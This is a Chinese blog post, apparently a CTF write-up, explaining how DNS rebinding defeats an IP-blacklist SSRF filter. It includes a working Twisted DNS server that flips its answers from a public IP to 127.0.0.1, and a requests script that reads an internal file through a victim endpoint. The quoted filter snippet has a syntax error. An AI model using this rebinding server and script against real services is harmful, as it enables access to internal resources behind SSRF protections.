dns rebinding attack

最新推荐文章于 2022-08-10 22:54:59 发布
最新推荐文章于 2022-08-10 22:54:59 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38677814/article/details/104290792
版权
前言:P牛曾在文章中写到拒绝SSRF的方法,但是这种方法真的完美无缺吗?

https://www.leavesongs.com/PYTHON/defend-ssrf-vulnerable-in-python.html

套用P牛的话来说,答案是否定的。在他的评论区里,我们可以窥探到一些秘密。由于篇幅所限,P牛没有在这篇文章中直接讲绕过的方式,但这一提示dns重绑定,让我们知道这种攻击手段的厉害之处。

在这里插入图片描述
直接拿题目来说,题目开放了某个端口A,A端口有web服务,通过内网可以直接访问某个文件,但是如果是外来的ip就不行,P牛的文章中有过滤SSRF的代码。这里直接截取一部分,方便阅读,完整的就在他文章里。

    def is_inner_ipaddress(ip):
        ip = ip2long(ip)
        return ip2long('127.0.0.0') >> 24 == ip >> 24 or \
                ip2long('10.0.0.0') >> 24 == ip >> 24 or \
                ip2long('172.16.0.0') >> 20 == ip >> 20 or \
                ip2long('192.168.0.0') >> 16 == ip >> 16 \
                ip2long('0.0.0.0') >> 24 == ip >> 24

通过这篇文章了解dns绑定的攻击手段(必看)
http://www.bendawang.site/2017/05/31/%E5%85%B3%E4%BA%8EDNS-rebinding%E7%9A%84%E6%80%BB%E7%BB%93/

具体攻击流程参考了上述文章的第三个方法
我在dnspod上花1块钱抢了一个1年的域名,然后换成cloudflare的域名解析服务器,由他帮我做解析
在这里插入图片描述
在ip:115.159.106.12 我的服务器上 运行脚本

from twisted.internet import reactor, defer
from twisted.names import client, dns, error, server

record={}

class DynamicResolver(object):

    def _doDynamicResponse(self, query):
        name = query.name.name

        if name not in record or record[name]<1:
            ip="115.159.106.12" # 绕过过滤
        else:
            ip="127.0.0.1" # 内网

        if name not in record:
            record[name]=0
        record[name]+=1

        print name+" ===> "+ip

        answer = dns.RRHeader(
            name=name,
            type=dns.A,
            cls=dns.IN,
            ttl=0,
            payload=dns.Record_A(address=b'%s'%ip,ttl=0)
        )
        answers = [answer]
        authority = []
        additional = []
        return answers, authority, additional

    def query(self, query, timeout=None):
        return defer.succeed(self._doDynamicResponse(query))

def main():
    factory = server.DNSServerFactory(
        clients=[DynamicResolver(), client.Resolver(resolv='/etc/resolv.conf')]
    )

    protocol = dns.DNSDatagramProtocol(controller=factory)
    reactor.listenUDP(53, protocol)
    reactor.run()



if __name__ == '__main__':
    raise SystemExit(main())

pip install twisted
python dns.py

测试:
dig @8.8.8.8 rebind.godspeedcurry.club
在这里插入图片描述
再dig一次
在这里插入图片描述
此外,ceye.io上也有dns rebinding的工具,它可以做到随机返回两个地址中的一个,也是可以用的。

攻击脚本如下

import requests
url = 'http://victim.xx/url=http://rebind.godspeedcurry.club:9999/key' # or 下面这个
url = 'http://victim.xx/url=http://r.djs5cm.ceye.io:9999/key' # ceye平台
r = requests.get(url=url)
print (r.text)

攻击流程:rebind.godspeedcurry.club 转成ip 115.159.106.12 绕过过滤,waf觉得没问题,然后再次访问rebind.godspeedcurry.club时,ip变成了127.0.0.1 此时waf后悔莫及,我们已经读取到敏感文件了。

攻击中存在的问题:我一度使用chrome浏览器直接访问脚本里的url,一次都没有拿到文件内容,猜测是缓存了什么东西,第二天想干脆用脚本发,直接就拿到了答案。做这个攻击还是有点玄学的,不能保证每一次都成功。

god_speed丶
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dns-amplification.tar.gz_dns attack
09-14
Perl script for DNS Amplification attack.
渗透测试-DNS重绑定
cdyunaq的博客
05-10 2980
- 前言 - SSRF绕过的一种思路,就是利用DNS重绑定,它也被广泛用于绕过同源策略,本质就是欺骗客户端请求的IP地址。 但是之前都是用如xip.io等别人搭建好的平台去利用,没有自己搞过,也没能彻底理解其中的原理 - DNS重绑定 - 浏览网页过程中,用户在地址栏中输入包含域名的网址,浏览器通过DNS服务器将域名解析为IP地址,然后向对应的IP地址请求资源,最后展现给用户。即域名 => 公共DNS服务器 => IP 但是作为域名的所有者,可以随时设置解析IP,举例如下: 用户第.
DNS重绑定DNS Rebinding攻击
03-17 728
DNS重绑定DNSRebinding攻击 在网页浏览过程中,用户在地址栏中输入包含域名的网址。浏览器通过DNS服务器将域名解析为IP地址,然后向对应的IP地址请求资源,最后展现给用户。而对于域名所有者,他可以设置域名所对...
DNS Rebinding Attack
liuyuyang1023的博客
03-18 731
DNS Rebinding Attack Examples of DNS rebinding attacks DNS rebinding attacks have been known for quite a long time. For example, Stanford Web Security Research Team posted a whitepaper about DNS rebin...
dnsmasq possible DNS-rebind attack detected错误
weixin_30740581的博客
09-16 3674
最近在做openwrt的平台,dns使用的是dnsmasq,但是通过板子上网,将PC的dns设置成板子的时候,发现百度等都可以,但是公司邮箱打不开。公司邮箱的域名 xx-xx-notes.xxx.com.cn的形式,于是把dnsmasq的log打开看了下。终于找到问题所在。 打开dnsmasq log的方法 1. 找到/etc/dnsmasq.conf 在...
OpenWRT 日志里面大量possible DNS-rebind attack detected
李元芳的博客
03-18 4206
安装的LEDE属于OpenWRT,如果日志中有类似报错,应该都可以解决。 完整报错为:daemon.warn dnsmasq[6661]: possible DNS-rebind attack detected: ***(网址) 这个关掉重绑定保护就好了 打开路由后台->网络->DHCP/DNS->一般设置->重绑定保护(丢弃RFC1918上行响应数据) ...
【Seed Lab】DNS Rebinding Attack Lab
cold_windx的博客
08-10 3853
本实验中模拟的物联网设备是一个恒温器,用于控制室内温度。客户端需要能够与服务器交互,以此设置温度。物联网设备在防火墙后面,外部设备不能与之交互,因此不能控制恒温器。为了击败防火墙保护,攻击代码必须首先进入内部网络。当来自内部网络的用户访问攻击者的网站时,攻击者的代码(JavaScript代码)实际上是从用户的浏览器中运行的,因此在受保护的内部网络中运行。然而,由于浏览器实现的沙箱保护,攻击者的代码仍然不能与物联网设备交互,即使它现在在内部网络中。...
[DNS安全] 详解DNS重绑定攻击
PsgQ的博客
08-01 3090
DNS重绑定攻击的用法有很多种,这篇文章主要理解DNS重绑定攻击的原理,并介绍如何通过DNS重绑定来攻击内网设备。为了更好的理解DNS重绑定攻击,我们先从Web浏览器的同源策略开始介绍。点击查看往期关于DNS文章: SAD DNS–新型DNS缓存中毒攻击 DNS 缓存中毒–Kaminsky 攻击复现同源策略(Same origin policy) 是一个重要的安全策略,它用于限制一个origin的文档或者它加载的脚本如何能与另一个源的资源进行交互。它能帮助阻隔恶意文档,减少可能被攻击的媒介。其实换句话来说就
WARNING: POSSIBLE DNS SPOOFING DETECTED!(警告:可能的DNS欺骗检测!)
qq_44833146的博客
12-13 2948
今天在阿里云主机上分发脚本出现了这个警告:(警告:可能的DNS欺骗检测!) 原因是:前面的实例删除了,后面又自己在建立了一个同名的实例, 解决:进入到 /home/atguigu/.ssh/known_hosts 中将known_hosts文件删除 ...
dnsmasq_reload:适用于Mac的dnsmask重新加载脚本
05-04
dnsmasq重新加载 一个简单的脚本,使用launchctl watch目录检测/ etc / hosts文件中的更改并重新加载dnsmasq数据。 简单安装 chmod + x install.sh 须藤./install.sh
DNS缓存中毒实验】SEED lab:DNS Remote Attack Lab The Kaminsky Attack
04-11
DNS缓存中毒实验】SEED lab 远程DNS实验代码,The Kaminsky Attack Lab详情操作可见博客 原创代码,码字不易 实测可完成攻击,遇到问题,请及时联系博主。
dns-rebinding-tool-docker:具有自定义脚本的dns重新绑定工具(Docker版本)
05-15
带有dns-rebinding-tool的Docker容器 开始: # git clone https://github.com/cyberpunkych/dns-rebinding-tool-docker # cd dns-rebinding-tool-docker 开始之前,在docker-compose.yml文件中编辑DOMAIN和DOMAIN_...
A Cache Poisoning Attack Targeting DNS Forwarding Devices
11-20
通过对流行的家庭路由器模型和DNS软件进行测试,我们发现了几个易受攻击的实现,包括大型供应商的实现(例如,D-Link、Linksys、dnsmasq和MS DNS)。此外,通过一项全国性的测量,我们估计了使用易受攻击的域名系统...
coredns.tar
01-09
coredns.tarcoredns.tarcoredns.tarcoredns.tarcoredns.tarcoredns.tarcoredns.tar
infrared-remote-candroid studiodemo
最新发布
05-05
android studio下载
【新质生产力】新质生产力赋能智能制造数字化解决方案.pptx
05-05
【新质生产力】新质生产力赋能智能制造数字化解决方案.pptx
基于matlab实现的用于应用布格重力异常数据反演地下异常密度体.rar
05-05
基于matlab实现的用于应用布格重力异常数据反演地下异常密度体.rar
dns rebinding attack lab
03-16
DNS重绑定攻击实验室是一个用于测试网络安全的实验室。该实验室旨在模拟DNS重绑定攻击,这是一种利用Web浏览器的漏洞,通过欺骗用户访问恶意网站来获取用户敏感信息的攻击方式。在实验室中,用户可以学习如何识别和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值